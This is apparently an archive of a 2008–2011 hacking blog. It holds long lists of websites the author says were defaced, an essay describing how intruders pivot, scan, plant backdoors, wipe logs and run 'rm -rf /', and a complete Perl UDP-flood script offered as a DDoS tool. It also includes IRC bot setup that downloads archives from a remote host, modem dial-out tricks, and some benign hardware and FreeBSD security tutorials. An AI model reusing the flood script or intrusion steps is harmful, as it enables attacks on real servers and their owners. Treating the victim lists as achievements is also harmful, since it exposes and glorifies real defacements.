hacking tutorial,Tips n Trick, Tools for networking

Site Deface 29 march 2011

2011-03-29T16:42:00.000+07:00

www.ssvs.ac.th
www.theislandteacompany.com
bm.hljgszx.com
bm010.com
boss.lzl98.com
buxingjie365.com
che78.com
card.baoanren.com
class.hldnews.com
chway.net
crm.gongrenzhaopin.com
crazyenglishcenter.com
www.festejossanpedro.com
www.findesemanaenasturias.com
daili.shanxiit.com
daogou800.com

disk.hzyhzhx.com
alcasino.info
unicd.com
seotech.info
seedphoto.com
edsv-seal.com
esbright.com
sandsforex.info
lukis.info
casinoduke.com
openorders.net
www.altoservice.co.uk
casinodance.com
bm.51yasi.com
camerabag.uni.cc
axcy88.cn
boatcrewjobs.info
affstore.com
asfzl.net
freesource-area.com
baidiy.com
6008765.com
asthatour.com
b16creativestudio.com
5ixh.com
shanghai.gufeiyong.com
secure.firstcallcomputing.com
www.11jm.com
autoqingdao.com
baikeshow.baikejob.com
www3.office-sp.co.jp
bbs.6639111.com
815885.com
baby9999.com
www.kolonpipe.com
www.mu17173.com
8248.net
88362222.com
www.plasticaitalia.it
www.mo5.cn
www.momaxx-trading-gmbh.de
208ok.com
3a3g.com
30wx.com
365ss.net
htjys.com
tasse.b-meindl.de
www.maddog.gr
www.dpa.com.ve
27118.com
27dm.com
www.tzshjxx.com
www.tzdcw.cn
asjtfw.com
art.gkabc.com
www.syxhzx.com
www.sjms.cc
trade.justtrade.in
mytel070.co.kr
www.airedale-gp-training.co.uk
www.beton.hu
emis.christian.ac.th
hdsqjy.tjhd.gov.cn
www.kartex.com.hk
www.ktvmv.com
www.365health.co.nz
siggesc.isegi.unl.pt
www.hnktz.com
tw.baskr.com
app.earthsearch.us
sts.ntue.edu.tw
www.lehmann-pr.cn
www.lichangzhu.com
my.scqiche.net
tp.tourispac.ch
0478e.com
www.elssme.com
0515sydn.com
www.becker.com.au
www.wsrcw.net
www.asetra.es
wap.aiyag.com
ad.aiyag.com
da.montes.upm.es
www.intechnetworks.es
www.lautianlu.com.tw
7777517.com
aqcdc.org
3woods.com
isose.org
ssynms.com
quickpopo.com
qinyuan8.com
www.bakeryzone.co.kr
sys.avtion.com
anmiso.com
qb.823.ss.la
www.823.ss.la
www.zednews.co.uk
you-inspire.co.uk
murgie.co.uk
frenchhouse.dailymail.co.uk
www.dzslyy.com
bd.enter6mall.com
www.dailymailoffers.co.uk
www.dgma.co.uk
lj.179dj.cn
sy.xuyiwy.com
www.jiujiuw.com
www.xuyizj.com
creif.montes.upm.es
www.operasurgery.co.kr
www.olv06.com
www.yanglao99.com
www.yanglao99.com
www.psdp-egypt.info
d2gods.com
www.valeriasa.com.br
www.shockit.ro
dunia-malaysia.page4.me
grupovelser.com
www.ccim.com.br
www.multimuebles.cl
publiprotege.com
www.losarijogjatour.com
www.hotelmurahjogja.com
sanprimasejati.com
innotechwireless.com
royalguardindonesia.com
www.zipskin-laptop.com
viewmycreation.co.cc
m.joyagps.com
joyagps.com
kvikselv.dk
corporatedaycare.co.in
infoprompt.net
sds.co.in
eisjasper.com
www.datasa.co.za
www.campusvirtuales.com.ar
hms.hebtu.edu.cn
www.lafrance-cafe.com.tw
acalstar.com
superbolao.lancenet.com.br
stihl.rental2k.it
www.es168.cn
www.sergiog.com.br
soledinverno.com
www.daiwa-dvr.jp
www.sergiog.com.br
soledinverno.com
www.daiwa-dvr.jp
www.neurologiarj.com.br
www.szthong.com
www.abreal.co.za
www.xalawyer.net
ecoricambi.com
ly-qc.com
www.shuzifun.com
www.jjcrj.com.cn
www.ahyijia.com
gpa.tmk.ac.th
tcc.e-bestis.com.tw
www.yqkmn.com
www.qasoft.com.cn
www.jindr.cn
sjzasd.com
www.dybr168.com
www.cncautomation.ca
www.zjtiger.com
huangxinxin.com
xm.newedu.org
www.klkxin.com
www.zxly.gov.cn
www.aditusnet.com
www.j-ride.com
lzsx.sclz.net.cn
fodony.com
ifix.freshcode.co.za
hejiahuanhotel.com
habitatstoreonline.com
hr.newedu.org
ruidososchools.org
www.df-lighting.com
hr.newedu.org
ruidososchools.org
www.df-lighting.com
www.chz114.com
jiayouwa.com
ncehome.913173.com
www.913173.com
www.china-consumer.net
xcjx.pyedu.cn
bendavidsalons.com
www.keshet.org.il
longhuong.com
www.jeeptrip.com
shrottweil.com
sqqsxx.pyedu.cn
www.66198198.com
www.snjcy.gov.cn
www.prattkidswrestling.com
www.filearchivos.com
www.soloshotel.com.ar
bha.com.ar
www.bjqxb.com
www.testa.com.ar
jsj.ahiec.net
www.lfdf.net
xsc.ahiec.net
1manbrand.co.uk
www.zfrt.net
member.wealth-mentors.com
bnd.ic-trade.com
www.whitesandstours.ae
dragonit.co.il
www.caferotshild.co.il
www.xfshenghuo.com
www.leaderkx.com
www.xfshenghuo.com
www.leaderkx.com
www.skhlmcmps.edu.hk
www.chinaoristand.com
haishengni.com
www.smkn10-mlg.sch.id
www.rioondeir.com
www.rechonchee.com.br
www.tudodabolsa.eti.br
www.overseadivecenter.com.br
moto.velik.org
www.magalhaesturismo.com.br
www.thedepository.biz
www.jjgas.com.cn
btwyp.com
www.qhdpt.com
www.yingruichem.com
punchaboveyourweight.com
www.astromagus.com
pcfan.com.tw
www.mailscan.nu
pbjchina.com
cnty100.com
ystjy.com.cn
crbbg.com
dalimj.com
vinayakford.com
www.mtt.co.kr
www.ilconsulente.net
www.solutione.com.br
www.glaucomadisease.com
wooam.com
www.dnn.catalystlearning.com
grandsoluxehotel.com
toyota-center.com.cn
toyota-center.com.cn
asp.mos8.com
bx.xsxgxx.com
www.sinpang.com
www.hfis.cn
sjxyz.cn
www.jnxhzdh.com
www.r80rugby.co.nz
www.sonachaandi.us
cs.maifun.com
bj.maifun.com
bbs.tiaofun.com
xfjtmy.com
www.sonachaandi.com
www.kuilongstone.com
www.euicex.com
yxtypx.cn
www.elekter.com
www.willowcrafts.com.cn
www.pixelhk.cn
training.oristand.com
www.bikeb2b.net
qddrjk-fs.com
safety.corna.biz
navecomp.com
agent.dns110.com
bokirestaurant.com
9buys.net
devarkalyanam.com
fashionwoodworks.com
sialn.com
jindugardenhotel.com
oelerfamily.net
w2.kinemo.com
www.kinemo.com

Site Deface 28 march 2011

2011-03-28T10:59:00.001+07:00

matakin.or.id
www.designers-avenue.com
www.divine-beauty.com
www.duniasprei.com
www.baccini-milano.com
www.tm-trade3000.com
ahlimasjid.com
lindanoviana.info
ies-nn.ru
bakul-tukul.com
gunungkidulkab.go.id
www.tiendanatural.com
www.south-store-watches.com
www.truffe-et-foie-gras.com
www.eramandutyfree.com

perpus.psik-umj.ac.id
www.universitasquality.ac.id
peternakan.gunungkidulkab.go.id
ictkotadepok.net
jurnalfortuna.com
beerenschwester.de
putradcyb3rassassins.blogspot.com
www.1-noveltyphones.com
www.vibrator-bg.com
ratu-collection.com
www.bijouterielanglois.com
www.torreschina.com
www.shirtfast.com
artisanmexico.com
www.pocketcrib.com
puddlejumpersuperstore.com
www.byardllc.com
www.hobbyroad.com
www.mifarmaciasanlorenzo.com
www.buybreak.com
www.besteasystore.com
webskis.com
www.crossbowdeals.com
diceoutlet.com
www.tikiandme.com
comercio.centregar.com
www.razorpit.com
www.fabu-licious.com
www.thedailyplanner.com
www.mebliplus.com
www.repuestosjuanito.com
www.mobilecellphoneaccessories.com
www.efflearn.com
www.inspiredepot.com
www.coscofloor.com
pattaya-web-services.com
www.naughtynightware.com
cjinternetsales.com
sex-shop.si
doodle-wraps.com
louisianahandbook.com
komunitas.coder.web.id
nuditeecovered.com
shoppingduvalstreetkw.com
adoreswimwear.com
www.cabikini.com
www.maxima-sport.pl
www.onlineprescription-pharmacy.com
www.prescription-medicals.com
www.servis-femec.si
negozio.acquaservice.org
www.tdamarant.ru
daniani.web.id
www.corhaven.co.uk
www.crookedimaging.co.uk
www.conquest-games.co.uk
www.thecaninecook.com
www.pccompro.com.ar
whyufirst.com
www.bedcentreuk.co.uk
www.boogylondon.com
antiagingskincareproductreview.com
www.appliancesparesonline.co.uk
opencart.westmontcomputer.com
keltecsub2000.com
stylistbackgrounds.com
mythemecorner.com
www.creative4kids.com
www.centaurguitar.com
www.stieindonesia-ptk.ac.id
loja.okinfo.com.br
rachmatefendi.com
opencart.aicosistemas.cl
www.digitalbazzar.co.uk
www.ies-nn.ru
bakul-tukul.com
www.lindanoviana.info
www.ahlimasjid.com
dean-smith.com
agen-pasar.com
kedaikartika.com
safeindonesia.com
carissa-onlineshop.com
trust-movers.com
www.iesal.web.id

Learn To be A Hacker

2011-03-26T18:03:00.002+07:00

Hackers with the expertise to see and fix vulnerabilities in computer software;
normally then published openly on the Internet for the system to be better. Unfortunately, few people take the evil use that information to crime - they are usually called a cracker. Basically the world of hackers and crackers are no different from the art world, here we talking art Internet network security.

I hope the science of network security in this paper is used for good things - be a Hacker not a Cracker. Do not until you get karma for using science to destroy property others. Moreover, at present the need for hackers is increasing in Indonesia with dotcommers more who want to IPO in the stock market. Good name and the value of a dotcom could fall even become worthless if the dotcom collapse. In this case, the hackers expected to be a security consultant for the dotcommers it - because the HR party police and security forces in Indonesia is very very weak and pathetic in the field of technology Information & Internet. What may make cybersquad, private cyberpatrol probably need at budayakan for survival dotcommers Indonesia on the Internet.

Various Internet network security techniques can be easily obtained on the Internet, among others, inhttp://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org,
http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Most
of this technique in the form of books that the number of its several hundred pages that can be taken in
free of charge (free). Some Frequently Asked Questions (FAQ) about network security can

obtained in http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm. And for
the experimenter some script / program that is so can be found among others in http://bastille-
linux.sourceforge.net /, http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
For those readers who wish to gain knowledge about the network can be downloaded free of charge from
http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Some book-shaped
softcopy can be taken free of charge to the capture of http://pandu.dhs.org/Buku-Online/. We must
especially grateful to the team led by Pandu I Made Wiryana for this. At this time,
I do not know of any place of active discussion Indonesia discuss these hacking techniques -
but may be partly discussed in the mailing list information such as kursus-linux@yahoogroups.com
& Linux-admin@linux.or.id which are operated by the Indonesian Linux Users Group (Ltsp)
http://www.kpli.or.id.
The simplest way to see the weakness of the system is by way of seeking information from
various vendors for example in http://www.sans.org/newlook/publications/roadmap.htm # 3b on
weakness of the system they have created yourself. In addition, monitoring the various mailing lists at
Internet which related with security network like in list
http://www.sans.org/newlook/publications/roadmap.htm # 3e.
Described by Front-line Information Security Team, "Techniques Adopted By 'System Crackers'
When Attempting To Break Into Corporate or Sensitive Private Networks, "fist@ns2.co.uk

http://www.ns2.co.uk. A Cracker generally men aged 16-25 years. Based on user statistics
Internet in Indonesia, then in fact the majority of Internet users in Indonesia are children younger
at this age as well. Indeed, this age is the age that is ideal in studying new including
Internet knowledge, very unfortunate if we do not succeed menginternetkan to 25,000 Indonesian school
s / d in 2002 - as the foundation for the future of Indonesia is in the hands of our young kids this.
Well, the young cracker cracking is generally done to improve the ability /
use the resources on the network for its own sake. Generally, the cracker is
opportunistic. Seeing the weakness of the system to carry out the scanner program. After gaining access
root, the cracker will install a back door (backdoor) and close all general weakness
there.
As we know, generally the various companies / dotcommers will use the Internet to (1)
Web hosting their servers, (2) e-mail communication and (3) provide access web / internet to
its employees. Internet and Intranet network separation is generally performed using
engineering / software firewall and proxy server. Seeing the conditions of use of the above, the weakness of the system
generally can penetrate through the mail server for example with external / outside that is used for
easy access to the mail out of the company. In addition, by using aggressive-SNMP
scanner and a program that forced the SNMP community string to convert a router into
bridge (bridge) which can then be used for a stepping stone to get into the network
company's internal (Intranet).
In order for crackers protected during the attack, the technique cloacking (incognito) is done
by jumping from the previous machine has been compromised (conquered) through program
telnet or rsh. At an intermediary machine that uses Windows attack can be performed with
Wingate jumped out of the program. In addition, the jumps can be done through a proxy device
configuration is less good.
After a successful jump and into other systems, usually a cracker to probe against
network and gather the information needed. This is done in several ways,
eg (1) use nslookup to run the command 'ls ', (2) see
HTML file on your web server to identify other machines, (3) to see various documents on
FTP servers, (4) connecting to the mail server and use the command 'expn ', and (5)
her finger users on other external machines.
The next step, the cracker will identify network components that are trusted by the system what
only. These network components are usually the administrator machine and the server that is usually considered
most secure in the network. Start by checking access & NFS exports are critical to various directories
such as / usr / bin, / etc and / home. Exploitation of the machine through the weakness of the Common Gateway Interface (CGI),
with access to the file / etc / hosts.allow.
Next cracker should identify network components that are weak and can be conquered.
Crackers can use the program in Linux like ADMhack, mscan, nmap and many small scanner
other. Programs such as 'ps' and 'netstat' in for a trojan (remember the Trojan horse story? In classical greek story
old) to hide the scanning process. For a fairly advanced cracker can use
aggressive-SNMP scanning to scan equipment with SNMP.
Once the cracker managed to identify the network components are weak and can be conquered, then
cracker will run a program to conquer the weak daemon program on the server. Program
daemon is a program on a server that normally runs in the background (as daemon / demon).

The success of conquering this daemon program will allow a cracker to obtain
access as 'root' (the highest administrator in the server).
To eliminate the trace, a cracker usually perform the cleaning operation 'clean-
up 'operation by way of cleaning the various log files. And add the program to enter
from the back door 'backdooring'. Changing. Rhosts file in / usr / bin for easy access to the machine
that be conquered through rsh & csh.
Furthermore, a cracker can use a machine that has been conquered for their interests
own, such as taking sensitive information that should not be read; mengcracking machine
other by jumping from the machine be conquered; install a sniffer to see / record the various
traffic / communication is passed; can even turn off the system / network by running
command 'rm-rf / &'. The latter will be very fatal consequences because the system will be destroyed at all,
especially if all the software in put in the hard disk. Process re-install the entire system must be done,
would be a headache if it is done on machines that run mission critical.
Therefore all machines & routers that run mission critical should always check
security & on patch by newer software. Backup is very important especially in
machines that perform critical missions in order to be saved from the act of disabling cracker
system with 'rm-rf / &'.
For those of us who wrestle daily on the Internet usually it will greatly appreciate the presence of
hacker (not cracker). Because thanks to the hackers, the Internet is there and can we enjoy such
today, even kept in repair to be a better system. Various weaknesses
system be improved because of cleverness fellow hackers who often times they will be working on improvements.
voluntarily because of his hobby. Moreover, often the result of his hacking distributed free of charge
on the Internet for the purposes of the Internet community. A culture of mutual help values & Noble it grows in cyberspace Internet that usually seem futuristic and far from the social sense.

Tools For DDOS website

2011-03-26T17:33:00.004+07:00

#!/usr/bin/perl
#####################################################
# udp flood.
#
# www.everydaywith.us
#
#Perl script For Denial Of services
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 \n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - everydaywithus";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

hacking wireless with laptop

2011-03-26T15:27:00.001+07:00

This video just for knowledge

Site Deface 26 march 2011

2011-03-26T15:13:00.001+07:00

www.skbkotabatam.com
en.sarebangallery.com
www.sifu.my
smkserimahawangsa.edu.my
cbi.messagetarget.com
messagetarget.com
liquidfire.co.za
capitalsense.za.net
andyblog.za.net
www.picturenames.co.uk
www.homebizmedia.com
box2.host1free.com
spirr-itube.com

moltenpros.com
nanovisuals.com
www.dtodhomemarketdelivery.com.au
www.rwcmaine.com
maldo.tv
www.annisaputrirahmanto.com
globalscoutreport.com
iprayla.org
audionetbook.com
indamixx.com
mobiledaw.com
hdmidjs.com
badflo.wen.ru
xrobe.com
vodtv.cc
evidence.za.org
cdewservices.co.za
applegranite.za.net
shaunbartlett.co.za
liquidfire.mobi
skycaster.tv
executiveautocare.za.net
cpf.za.org
fidb.info
citynet.za.net
kurios.tv
dbc.za.org
neolive.za.net
cbi.za.net
grapevineonline.info
rolfrhodes.com
mymindskey.com
ohsosweetdesigns.com
jumpyparty.com
www.pinlabs.unair.ac.id
isaiascenter.com
rohatools.com
www.letempsdesfils.fr
moune54.free.fr
www.timbrecarimbosartesanais.com.br
passarosenaturez.web43.f1.k8.com.br
www.discosdevinilcalcadapaulista.com
transpartsdirect.com
etowahliving.com
nuojieer.com
www.tcoverstock.com
boyimy.com
www.szsdf.com
www.ifmotorsports.com
patesi.com
i-costar.com
loyo-car.com
szusbking.com
phoenixjd.com
zhongaiyis.com
goldensheep1997.com
monster-transmissions.com
allchineseparts.com
www.sunnymotor.com
www.powersportsgalaxy.com
www.wavplanet.com
www.mitrapulsaindonesia.com
payments.gwresources.com
randall-coleman.com
www.theidiomhouse.com.br
www.littleangelcards.co.uk
www.tootsiefootsie.co.uk
villa-boki.de
www.americanspectrum.com
www.kappauns.com.br
holdemfriends.de
www.maozinhasdeanjo.org.br
revolta.star-kom.pl
grupovelser.com
agentur-24.eu
casa-lavanda.com
bizermani.com
www.bigbargainsonline.co.za
hometown.my
shopto.in
kreatvisual.mx
tallyindia.co.in
webshop.incitus.no
meerschaum-pfeifen.com
www.umoja.co.nz
www.akmeneliurojus.lt
vivapens.su
pipexstore.host22.com
www.novitet.dk
kambingonline.net
www.lutashop.com.br
www.hans.com.eg
www.vikon-shardy.hr
kdsoft.de
steakstones.com
www.elracodelesflors.es
www.todoenjoyas.cl
oka.cl
www.ekoaromas.cl
www.sema-online.be
thetimeclockstore.com
www.materiel.ci
mareaelectronica.com.ar
granthamdesigns.com
www.flowershop.az
testspotz1.site90.com
ezshoponline.com
infofisioterapi.com
westerlyhospital.org
bringraph.com.br
mntaxidermy.com
redsandaltours.com
www.employmentbrockville.com
aquacor.com.au
thematrixxpowersuit.com
800pg.co.cc
sitesdeprovence.free.fr
pantai.pusair-pu.go.id
lk.pusair-pu.go.id
rawa.pusair-pu.go.id
irigasi.pusair-pu.go.id
hidrologi.pusair-pu.go.id
hidrologi.pusair-pu.go.id
hathi.pusair-pu.go.id
bhgk.pusair-pu.go.id
web2.pusair-pu.go.id
www.pusair-pu.go.id
www.globaltrucks.hu
www.fushicopperweld.com
www.spitzeleben.de
www.doggies.com.my
www.isbm-school.com
mkspace.biz
www.mitrapulsaindonesia.com
cyber.sman1narmada.sch.id
lab.sman1narmada.sch.id
perpus.sman1narmada.sch.id
doc.sman1narmada.sch.id
media.sman1narmada.sch.id
e-learning.sman1narmada.sch.id
site.sman1narmada.sch.id
jibas.sman1narmada.sch.id
www.sman1narmada.sch.id
www.ikomputer.com
artihidupku.com

Chinese Hackers acting

2011-02-15T02:14:00.002+07:00

The hackers (hackers) who operate from China allegedly managed to steal information belonging to oil companies and gas from Western countries. The way to break through the

computer network company in question though is equipped with advanced devices.

According to the Associated Press news agency the report was submitted by one of the leading manufacturers of anti-virus, McAfee Inc.., Thursday, February 10, 2011. He did not mention any company that successfully sabotaged Chinese hackers. Oil and gas companies were mentioned only in the United States (U.S.), Taiwan, Greece, and Kazakhstan.

McAfee said that the hacker attacks that began in November 2009. "They identified tools, techniques, and network activities that are used in the attack, which we refer to as 'Dragon Night,' mainly originated in China," according to McAfee.

Method of operating the hackers it is considered not to elaborate. However, they are known to be very patient and have for years allegedly infiltrated in the target computer network.

"It looks like the traditional style, which is paved to steal data," said Josh Shaul, executive security services company computer system from Application Security Inc.. in New York.

Last year, in a joint report from McAfee and Centers Center for Strategic and International Studies in Washington, USA, revealed that more than 300 power plant operators and other infrastructure admit they infiltrated the computer network is unknown.

In general, the motivation of hackers is to squeeze the companies they seek. Oil companies become soft targets because it is believed a very large income.

Get free Domain And Free Hosting with Cpanel

2009-01-29T23:58:00.002+07:00

you just click banner of above and find the domain to register. If you finished register some domain names (max 2 domain for free ) you can setup and register your hosting here or you can click a banner under this posting.

how to install MIRC bot eggdrop and psybnc

2009-01-10T18:50:00.002+07:00

I. How to make bot EGGDROP

1. Login your Shell
2. wget http://geocities.com/chibogacrew/azka.tgz
3. tar-zxvf azka.tgz
4. cd. temp
5. . / config nadya nick en ip shell chanel admin porttelnet
example:
. /nadya test arieyanie ccrew 123.01.23.56 chibogacrew samiun 1985
6. ./eggdrop test-m <- config files now live in the waiting on you dalnet channel , if I go bot bot is pv, type the password (type your password) such as a password 456789

II. How to Make Psybnc

1. Login Your Shell
2. wget http://geocities.com/chibogacrew/psy.tar.gz
3. tar-zxvf psy.tar.gz
4. cd. psy
5. . / config 1986 <--- port that can be selected in addition to this I
6. . / fuck
7. . / run

Build up your Computer

2009-01-09T18:58:00.004+07:00

1. Getting Started

Prepare all components of the computer you will raft, such as casing, mainboard, processor, video card, memory, hard disk, and optical drive (DVD-Rom). Prepare also mur, which is located on the screw in the casing, and also a screwdriver and pliers. Manual motherboard is also required when there is someone you do not understand in the future.

2. Installing the Processor and Memory motherboard

The next step is to install the processor on the mainboard. Open up the processor, remove the processor and equipped with heatsinks with the fan. Processor with a pair considering the 'elbow' of the processor and the socket on the mainboard (slide the cover and lift the first processor socket on the motherboard). Installation must fit between the mainboard with the processor.

After the pair heatsinks with fans on the top of the processor. The pair on the left and right heatsinks. After that 'key' heatsinks that integrates with the motherboard, and will not be easily undone. Do not forget to connect the power cable to the motherboard fan is usually located close to the left or right from the processor socket.

Set the memory (RAM) on the socket is available on the computer. Make sure the position of the slot according to the location of the memory. After fitting the position, press enter and memory that integrates with the motherboard. This will be visible to lock in the left and right will automatically rise to the top, when the memory is installed correctly.

3. motherboard to enter the computer casing

Time you enter into the casing motherboard. If you install the mainboard difficulty or collide with the power supply, you should first dislodged from power supply casing. Set first 'backplate' buffer (which is on the mainboard) on the inside casing. Backplate should be adjusted to the first position mainboard, and the aluminum bolongin who may still be closed from the original factory.

Then attach mur (check first that the position of the location fit the mainboard), which will be a buffer from the mainboard (mur over the form of air, beneath the screw-shaped) in the place provided on the casing. Ensure the right position, and key with pliers. After take motherboard on the top of the mur, and kuncilah with the screw. Make sure mur installed correctly, so that the mainboard when appointed, will not move.

connected choke cable power supply with the mainboard, note that the cable is suitable for the (usually located close to the memory). There are 2 cables that you need to install (if a certain type of computer or type 1 long free cable only).

Then there is the cable that lies at the bottom of the casing, which have about 15 pieces cable. To install, you need to see the manual of your motherboard, or sometimes have information on the motherboard, with the pair to see the position of + and - correctly, and be sure to be wrong.

4. Harddisk and install DVD-ROM/RW

The next step is to install a hard drive in place that have been provided on the inside casing. Usually located in the middle of the bottom of the casing. don't forget to connect the power cable to the hard disk, hard disk and the data cable to the motherboard, then kuncilah with the screw provided. In the video installation disk is still a long hard type that is still using the IDE. If the SATA hard disk is more or less the same, you only need the cable to match only to harddisk.

The step-ROM or DVD RW is also almost the same. You need to first remove the cover that is at the top of the casing. After the DVD-ROM drive installed, do not forget to lock the side of the four DVD-ROM with the screw provided. Do not forget to also connect the cable to the power of DVD-ROM and data cable to the mainboard. And one audio cable that can connect you with a sound card (if any) or the motherboard (if you onboard sound card).

The last step is to install VGA Card (if any). If you onboard VGA with the mainboard, this step can you ignore. VGA slots are usually located in the middle of the mainboard (processor side) with a slot that another color alone. In the video posted is AGP VGA Card, for a new type (PCI-E), is the same way.

HOW TO DIAL OUT ON A UNIX SYSTEM

2008-12-20T04:06:00.000+07:00

This document makes the assumption that you are currently logged on to the
system and are sitting in a shell environment.
1. First of all we need to locate the L-devices file.
It should be found in the /usr/lib/uucp directory,
but in case it isn't typing:
find / -name L-devices -print
will show you where it is.

If you can't find it then don't worry as we can get
around it, only it will take a bit of trial and error.
2. If you found the L-devices file then we need to list
it by typing:
cat L-devices
If it runs off the screen then type:
cat L-devices | more
This will page the output - space displays the next
page and return will show the next line while q quits.
This file shows us to which serial line (port) the
modems (ACU's) are connected, it also shows when they
can be called and the baud rate.
We are interested in the serial line and the baud rate.
Choose a line with your desired speed and make a note of
the serial line. The speed is shown as 2400,1200,300 etc.
and the serial line as ttynn where nn is a number.
3. If you couldn't find/list the L-devices file then type:
who am i
This will show which serial line you are on, and as you
are on a modem then it's a fair bet that the others are
not too far away. e.g. If you are on line tty07 then
there's a good chance of a modem being on tty06,tty08 or
thereabouts.
4. Now we need to make a direct connection to the modem by
typing:
cu -sbaud -l/dev/ttynn dir
where baud and ttynn are your desired speed and serial
line respectively.
If you couldn't find/list the L-devices file then this is
where the trial and error I told you about comes in.
When you get it right it should come up with 'Connected'.
5. Now we are talking directly to the modem. As a precaution
at this point I suggest saving the modem's current config
by typing:
AT&W
Don't worry if you can't see what you are typing as it is
probably in quiet mode with echo off.
Now restore the factory default settings by typing:
AT&F
Now you can set up the modem as you require it, just as
you would with your own and use it as normal.
When you have finished type:
ATZ
to restore the modem back to it's initial state, then
type:
~.
It should come up 'Disconnected' and you should now be
back in your shell.
-------------------------------
It is probably best to try and log on to a RACE system on an 0800 number
as then it won't cost you a penny to call your favourite BBS's.

MSN Messenger

2008-12-20T04:05:00.000+07:00

Here is a tip for those of use who or security conscience. msn messenger
keeps a list of all the people who are on the contact list of anyone who
has used msn on your computer. open up regedit or what ever you use I use
nortons version.

step one: navigate to HKEY_CURRENT_USER
Step two: open up software
step three: open up microsoft
Step four: open up MessengerService
Step five: open up ListCache
step six: click on .NET Messenger Service and steer in amazment that all
that info is on your computer and u didn't even know about it
step seven: right click on .NET Messenger Service and press DELETE.
step eight: give yourself a pat on the back

Msn will continue to work as normal and as far as im aware it doesn't
replace the entry.

Note: I have only tested this on WIN98SE as that it's the only OS I havE
access to. if you use something else I suggest exporting the entry before
you delete it just to be sure your safe.

TrustedBSD Mandatory Access Control framework

2008-12-20T04:03:00.000+07:00

1. Introduction
===============

I've written this tutorial because FreeBSD's handbook
(http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html) didn't offer enough
information on how to correctly/safely install/configure/use MAC on a workstation. Please
refer to the man pages and handbook for detailed explanation on how everything works.

MAC (mandatory access control) is used to introduce system security modules in order to fortify
the default lack of security policies in most unices. This paper discusses the
instalation/configuration and basic use of the following policies:

mac_seeotheruids, mac_bsdextended, mac_ifoff, mac_portacl, mac_test, mac_none, mac_stub
mac_partition, mac_mls, mac_biba, mac_lomac

Compile your kernel with the new policies by adding the following line in the kernel conf. file:
options MAC

2. Simple policies
==================

These policies work without the use of the labelling feature:

A. mac_seeotheruids (man mac_seeotheruids)

$ ps ax |wc -l
90
# kldload mac_seeotheruids
# sysctl security.mac.seeotheruids.enabled=1
^^^ this is the default behaviour (use sysctl.conf to make permanent changes)
$ ps ax | wc -l
30

You can exempt a groupd ID from the policy:

$ id -G
2000
$ ps ax | wc -l
30
# sysctl security.mac.seeotheruids.specificgid_enabled=1
# sysctl security.mac.seeotheruids.specificgid=2000
$ id -G
2000
$ ps ax | wc -l
90

Or even let users see their primary groups processes: (remember to set seeotheruids.specificgid_enabled to 0)

# sysctl security.mac.seeotheruids.primarygroup_enabled=1
$ id -G
2000
# ps ax | wc -l
35
(my 30 processes + 5 others owned by the same group)

B. mac_bsdextended

Ever used ipfw ? This is fsfw (file system firewall).

# kldload mac_bsdextended
# ugidfw list
0 slots, 0 rules

# cat rc.mac_bsdextended
#!/bin/sh
i=0
while [ ${i} -le 4 ]
do
ugidfw remove ${i}
i=`expr ${i} + 1`
done
ugidfw set 0 subject uid new object uid root mode rsx
ugidfw set 1 subject uid new object gid wheel mode rsx
# yes, /bin/ls works now
ugidfw set 2 subject uid new object uid bugghy mode n
ugidfw set 3 subject uid new object gid bugghy mode n
# owned by bugghy == private :)
ugidfw set 4 subject uid new object gid nobody mode n
# new can't "locate | grep /home/bugghy" anymore <-- BIG security risk
# you can deny other groups (from /etc/group) or users (/etc/passwd)

$ id -u -nr
bugghy
$ echo sex > /tmp/bug; chmod a+rwx /tmp/bug; ls -l /tmp/bug
-rwxrwxrwx 1 bugghy wheel 4 Apr 5 20:05 bug*

$ id -u -nr
new
$ ls -l /home
ls: bugghy: Permission denied
total 4
drwxr-xr-x 2 new new 512 Mar 28 15:09 new
$ ls /tmp/bug
ls: /tmp/bug: Permission denied

C. mac_ifoff

# kldload mac_ifoff
$ ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.203 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 0.203/0.203/0.203/0.000 ms
# sysctl security.mac.ifoff.lo_enabled=0
$ ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

# sysctl security.mac.ifoff.other_enabled=1
^^^ we enable external interface (which is disabled by default)
You can write a script that runs aide (with a proper config file) and if it finds modified
files in the protected directories it won't allow external network traffic.
# sysctl security.mac.ifoff.bpfrecv_enabled=1
^^^ allows Berkeley Packet Filter traffic (man 4 bpf)

D. mac_portacl
To enable mac policies on sockets "sysctl security.mac.enforce_socket=1": (default value)

# kldload mac_portacl

# sysctl net.inet.ip.portrange.reservedlow=0
sysctl net.inet.ip.portrange.reservedlow: 0 -> 0
# sysctl net.inet.ip.portrange.reservedhigh=1000
sysctl net.inet.ip.portrange.reservedhigh: 1023 -> 1000
# sysctl security.mac.portacl.port_high=1010
security.mac.portacl.port_high: 1000 -> 1010

# sysctl security.mac.portacl.suser_exempt=0
^^^ rules apply for root too

$ id -u
2000
$ nc -l -p 1000
